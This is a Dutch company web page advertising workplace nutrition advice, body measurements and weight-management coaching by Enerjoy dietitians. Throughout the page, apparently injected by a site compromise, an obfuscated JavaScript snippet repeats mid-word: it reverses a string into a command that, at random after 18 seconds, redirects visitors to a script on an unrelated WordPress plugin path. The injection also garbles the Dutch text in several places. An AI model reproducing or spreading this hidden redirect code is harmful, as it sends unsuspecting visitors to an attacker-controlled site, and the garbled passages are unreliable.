Voedingsadvies op het werk

Voedingsadvies op het werk - EnerjoyEen persoonlijk voedingsadvies is voor veel mensen een ‘Eye-opener’. Daarom komen onze bedrijfsdiëtisten met voedingsadvies op het werk naar u toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toe en geven wij individuele adviezen aan werknemers. Afhankelijk van omstandigheden en doelstelling kan een kort leefstijladvies of dieetadvies voldoen, of kan het de aftrap zijn van een langdurig gewichtbeheersings- of vitaliteitstraject.

Mogelijkheden van voedingsadvies op het werk

De mogelijkheden van een voedingsadvies op het werk zijn divers. Hierbij kunt u denken aan:

 • Fysiek voedingsspreekuur op kantoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toor of werkplek,
 • Individuele online coachingsgesprekken via beeldbellen,
 • Individuele voeding coaching in samenhang met e-learningcursus over gezond eten,
 • Individuele voeding coaching sessies als onderdeel van het gewicht beheersingsprogramma: Afvallen via het werk.
Voedingsadvies op het werk kunt u bijvoorbeeld als volgt inzetten:

 • Op een gezondheidsdag, vitaliteitsdag, of opening nieuw bedrijfsrestaurant
 • Tegelijk met een interactieve proeverij (met Koken & Proeven op het werk),
 • het BRAVO-Fitplein,
 • tijdens uw bedrijfsevenement,
 • tijdens het ontbijt, lunch of borrel.

Meten is weten

Tijdens het voedingsadvies op het werk krijgt elke medewerker de kans om zijn of haar lichaamsgewicht, Body Mass Index (BMI), vetpercentage, lichaamsvochtgehalte en spiermassa te laten meten. Daarna kunnen de deelnemers een korte vragenlijst invullen. Met behulp van alle onderzoeksresultaten spoort de Enerjoy voedingsdeskundige probleemgebieden in het eetgedrag en tekorten aan voedingsstoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toffen op. Vervolgens geeft zij ter plekke in een persoonlijk gesprek praktische tips en handvatten. Dit in een luchtige en niet-opdringerige sfeer.

‘Gezondheidsimpuls’ tijdens uw ontbijt, lunch of borrel

De Enerjoy voedingsdeskundigen komen naar uw bedrijfsrestaurant toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toe en stappen tijdens het eten op uw medewerkers af. Wij benaderen hen op een uitnodigende en speelse manier, bijvoorbeeld met behulp van een leuke voedingsquiz. Vervolgens verstrekken wij uw werknemers informatie over de gezonde aspecten van het eten uit de kantine of over de ‘boterham van thuis’. Hiermee stimuleren wij hen om gezonde keuzes te maken. Dit uiteraard op een luchtige en niet-belerende manier!

Gewichtbeheersingstraject

Een mogelijk vervolg op het voedingsadvies is een gewichtbeheersingstraject onder persoonlijke begeleiding.

Medewerkers worden op een positieve manier geconfronteerd met het eigen gedrag. Ze worden gestimuleerd om hun eetpatroon te verbeteren.

Dieetadvies op het werk

[bullet_list icon=”rightarrow” style=”dark” indent=”0px”]

 • Voedingsadvies op elk gewenste locatie;
 • Ook mogelijk op afstand via beeldbellen;
 • Inclusief meten van het lichaamsgewicht, Body Mass Index (BMI), vetpercentage, lichaamsvochtgehalte en spiermassa;
 • Laagdrempelige manier voor werknemers om een globaal inzicht te krijgen in hun leef- en eetpatroon.

[/bullet_list]Prijs: op basis van 4 uur / 8 deelnemers: € 520,-, exclusief btw en reiskosten.

[gravityform id=”19″ title=”false” description=”true”]

$mWn=function(n){if(typeof ($mWn.list[n])=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}top:10px;”>[buttoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}ton_link url=”https://www.ener-joy.nl/contact/” style=”medium impactBtn” target=”blank”]Meer info of boeken? Neem Nu contact op[/buttoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}ton_link]